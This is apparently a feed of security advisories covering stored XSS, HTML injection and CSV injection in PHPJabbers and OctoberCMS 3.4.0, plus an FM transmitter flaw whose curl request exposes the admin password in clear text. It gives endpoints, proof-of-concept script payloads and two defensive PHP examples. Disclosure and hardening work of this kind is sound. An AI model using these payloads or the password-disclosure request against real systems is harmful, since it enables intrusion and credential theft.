<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple HTML Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48838<br /><br />Description:<br />PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple HTML<br />Injection. HTML injection, also known as HTML code injection or<br />cross-site scripting (XSS), is a web security vulnerability that<br />allows an attacker to inject malicious code into a web page that is<br />then viewed by other users. This can lead to various attacks, such as<br />stealing sensitive information, session hijacking, defacement of<br />websites, or delivering malware to users.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to System Menu then click SMS Settings.<br />3. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />4. You will see HTML code working here.<br /><br /><br />## Reproduce:<br />https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48838<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Wiki_article) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from a stored cross-site scripting vulnerability:<br />a user with the ability to create an article could perform a stored<br />XSS attack against any other users with the ability to create an article.<br />This can lead to the execution of arbitrary HTML/JS code in a user's browser<br />session in the context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5807<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5807.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[content]):<br />----------------------------------<br /><br />Endpoint: /backend/tailor/entries/wiki_article<br />Payload: EntryRecord%5Bcontent%5D="&lt;script&gt;alert(1)&lt;/script&gt;"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Category) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from a stored cross-site scripting vulnerability:<br />a user with access to the category-creating feature, which stores data<br />persistently, could perform a stored XSS attack against any other users<br />visiting the blog page. This can lead to the execution of arbitrary HTML/JS<br />code in a user's browser session in the context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5806<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5806.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[title]):<br />--------------------------------<br /><br />Endpoint: POST /backend/tailor/entries/blog_category/create<br />Payload: EntryRecord%5Btitle%5D="&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Blog) Stored Cross-Site Scripting Vulnerabilities<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from a stored cross-site scripting vulnerability:<br />a user with access to the blog-creating feature, which stores data<br />persistently, could perform a stored XSS attack against any other users<br />visiting the blog page. This can lead to the execution of arbitrary HTML/JS<br />code in a user's browser session in the context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5805<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5805.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (GlobalRecord[blog_name]):<br />-------------------------------------<br /><br />Endpoint: POST /backend/tailor/globals/blog_config<br />Payload: GlobalRecord%5Bblog_name%5D="&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Author) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from a stored cross-site scripting vulnerability:<br />a user with access to the author feature could perform a stored<br />XSS attack against any other users visiting the posts by the author. This<br />can lead to the execution of arbitrary HTML/JS code in a user's browser<br />session in the context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5804<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5804.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[title]):<br />--------------------------------<br /><br />Endpoint: /backend/tailor/entries/blog_author<br />Payload: EntryRecord%5Btitle%5D ="&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (About) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from a stored cross-site scripting vulnerability<br />exploitable by a user with the ability to edit the landing/about page. This<br />can lead to the execution of arbitrary HTML/JS code in a user's browser<br />session in the context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5803<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5803.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[blocks][1][content]):<br />---------------------------------------------<br /><br />Endpoint: POST /backend/tailor/entries/landing_page<br />Payload: EntryRecord%5Bblocks%5D%5B1%5D%5Bcontent%5D="&lt;script&gt;alert(1)&lt;/script&gt;"<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - HTML Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48837<br /><br />Description:<br />PHPJabbers Car Rental v3.0 is vulnerable to HTML Injection. HTML<br />injection, also known as HTML code injection or cross-site scripting<br />(XSS), is a web security vulnerability that allows an attacker to<br />inject malicious code into a web page that is then viewed by other<br />users. This can lead to various attacks, such as stealing sensitive<br />information, session hijacking, defacement of websites, or delivering<br />malware to users.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to System Menu then click SMS Settings.<br />3. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />4. You will see HTML code working here.<br /><br /><br />## Reproduce:<br />https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48837<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - Multiple Stored XSS<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48836<br /><br />Description:<br />PHPJabbers Car Rental v3.0 is vulnerable to Multiple Stored Cross-Site<br />Scripting. Multiple Stored XSS is a type of security vulnerability<br />that occurs when an application or website allows an attacker to<br />inject malicious scripts into the content that is permanently stored<br />on the server. Unlike reflected XSS, where the malicious script is<br />embedded in a URL and executed immediately, stored XSS involves the<br />persistent storage of the malicious script on the target server,<br />waiting for unsuspecting users to access the compromised content.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Vulnerable parameters are "name, plugin_sms_api_key,<br />plugin_sms_country_code, calendar_id, title, country name,<br />customer_name".<br />3. Go to System Menu then click SMS Settings.<br />4. Then use any XSS Payload in "SMS API Key", "Default Country Code"<br />input field and Save.<br />5. You will see popup.<br /><br /><br />## Reproduce:<br />https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48836<br /></code></pre>
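<p>The stored XSS and HTML injection reports above (the OctoberCMS title and content fields, the PHPJabbers settings fields) share one root cause: a stored value is written into a page without output encoding. The following is an added example, not code from either product: a hypothetical template (<code>render_page()</code>) renders a stored title and a stored <code>plugin_sms_api_key</code> value with and without encoding, and a regression check (<code>unexpected_elements()</code>, also hypothetical) parses the result and reports any element the template did not declare.</p>

```php
<?php
declare(strict_types=1);

// Encode a stored value for HTML text or a quoted attribute value.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE keeps invalid
// UTF-8 from turning the whole string into an empty one.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hypothetical page template; $encode switches between the weak and hardened form.
function render_page(string $title, string $apiKey, bool $encode): string
{
    $t = $encode ? e($title) : $title;
    $k = $encode ? e($apiKey) : $apiKey;
    return "<!DOCTYPE html><html><head><title>{$t}</title></head><body>"
         . "<form><input type=\"text\" name=\"plugin_sms_api_key\" value=\"{$k}\"></form>"
         . "</body></html>";
}

// Parse the rendered page and list every element the template did not declare.
function unexpected_elements(string $html): array
{
    $allowed = ['html', 'head', 'title', 'body', 'form', 'input'];
    libxml_use_internal_errors(true); // collect parser warnings instead of emitting them
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    $found = [];
    foreach ($doc->getElementsByTagName('*') as $node) {
        if (!in_array($node->nodeName, $allowed, true)) {
            $found[] = $node->nodeName;
        }
    }
    return $found;
}

// Constructed stored values: the title payload quoted in the advisories above
// and a harmless tag that tries to close the attribute it is stored in.
$title  = '</title><script>alert(1)</script>';
$apiKey = '"><b>bold</b>';

foreach ([false, true] as $encode) {
    $extra = unexpected_elements(render_page($title, $apiKey, $encode));
    printf("encode=%s unexpected=[%s]\n", $encode ? 'yes' : 'no', implode(',', $extra));
}
```

<p>A check like this can run in CI against every template that echoes user-editable fields, failing the build when a stored value produces an element of its own.</p>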
<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - CSV Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, MS Office 2010<br /># CVE-2023-48835<br /><br />Description:<br />PHPJabbers Car Rental v3.0 is vulnerable to CSV injection,<br />which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48835<br /></code></pre>
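<p>The CSV injection report above comes down to stored field values reaching the export file unchanged, so a spreadsheet interprets them as formulas. The following is an added example of neutralising cells at export time, not code from the product; the function names and the sample rows are constructed for illustration, and the list of trigger characters follows the commonly cited OWASP guidance.</p>

```php
<?php
declare(strict_types=1);

// Leading characters that make a spreadsheet treat a cell as a formula.
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

// Neutralise one cell. Plain numbers (including negative ones) pass through;
// any other value starting with a trigger gets a leading apostrophe so the
// spreadsheet shows it as text instead of evaluating it.
function neutralise_cell(string $cell): string
{
    if ($cell === '' || is_numeric($cell)) {
        return $cell;
    }
    return in_array($cell[0], FORMULA_TRIGGERS, true) ? "'" . $cell : $cell;
}

// Build the CSV in memory; fputcsv() handles quoting of commas, quotes and newlines.
function export_csv(array $rows): string
{
    $fh = fopen('php://memory', 'w+');
    foreach ($rows as $row) {
        $cells = array_map('neutralise_cell', array_map('strval', $row));
        fputcsv($fh, $cells, ',', '"', '');
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed sample rows: a header, a normal record, and records whose
// first field starts with a formula trigger.
$rows = [
    ['unique_id', 'customer_name', 'total'],
    ['RC-1001', 'Alice', '120.50'],
    ['=1+1', 'Bob', '-15'],
    ['@SUM(A1:A2)', 'Carol, Jr.', '80'],
];

echo export_csv($rows);
```

<p>Validation at input time still helps, but the export path is where the control belongs, because values already stored before a fix would otherwise reach the file unmodified.</p>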
<pre><code><br />R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure<br /><br /><br />Vendor: R Radio Network<br />Product web page: http://www.pktc.ac.th<br />Affected version: 1.07<br /><br />Summary: R Radio FM Transmitter that includes FM Exciter and<br />FM Amplifier parameter setup.<br /><br />Desc: The transmitter suffers from improper access control<br />that allows an unauthenticated actor to directly reference the<br />system.cgi endpoint and disclose the clear-text password of the<br />admin user, allowing authentication bypass and FM station setup<br />access.<br /><br />Tested on: CSBtechDevice<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5802<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php<br /><br /><br />09.10.2023<br /><br />--<br /><br /><br />$ curl -s http://192.168.70.12/system.cgi<br />&lt;html&gt;&lt;head&gt;&lt;title&gt;System Settings&lt;/title&gt;<br />...<br />...<br />Password for user 'admin'&lt;/td&gt;&lt;td&gt;&lt;input type=password name=pw size=10 maxlength=10 value="testingus"&gt;&lt;/td&gt;<br />...<br />...<br />$ <br /></code></pre>